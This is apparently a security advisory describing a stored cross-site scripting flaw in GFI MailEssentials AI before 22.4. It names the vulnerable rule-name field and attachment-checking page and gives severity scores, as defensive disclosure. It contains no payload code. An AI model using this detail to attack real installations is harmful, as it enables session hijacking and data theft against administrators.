In GFI MailEssentials AI versions before 22.4 a stored cross‑site scripting flaw resides in the attachment filtering rule creation workflow. An attacker who is authenticated to the management interface can supply arbitrary HTML or JavaScript in the rule name field, which is stored unfiltered and later rendered inside the rule editing view. The result is that whenever any logged‑in user views or edits the malicious rule, browser‑side code runs with the privileges of that user, enabling session hijacking, data theft or further client‑side attacks. The weakness stems from improper input validation and output encoding.

The flaw affects all installations of GFI MailEssentials AI released prior to version 22.4. The vulnerability exists in the attachment checking page located at /MailEssentials/pages/MailSecurity/attachmentchecking.aspx. All product variants that expose this page are susceptible, regardless of deployment size or configuration.

The CVSS base score is 5.1, indicating medium severity. EPSS is reported as less than 1 %, showing a very low likelihood that exploitation is occurring currently, and the vulnerability is not listed in the CISA KEV catalog. Exploitation requires legitimate credentials to the management console; an attacker who can create a rule can embed malicious payloads that trigger when any user accesses that rule. Because the attack is authenticated and the page is rendered client‑side, the risk is limited to user accounts that view the rule, but it can still compromise confidential data or inject further malicious content into administrative sessions.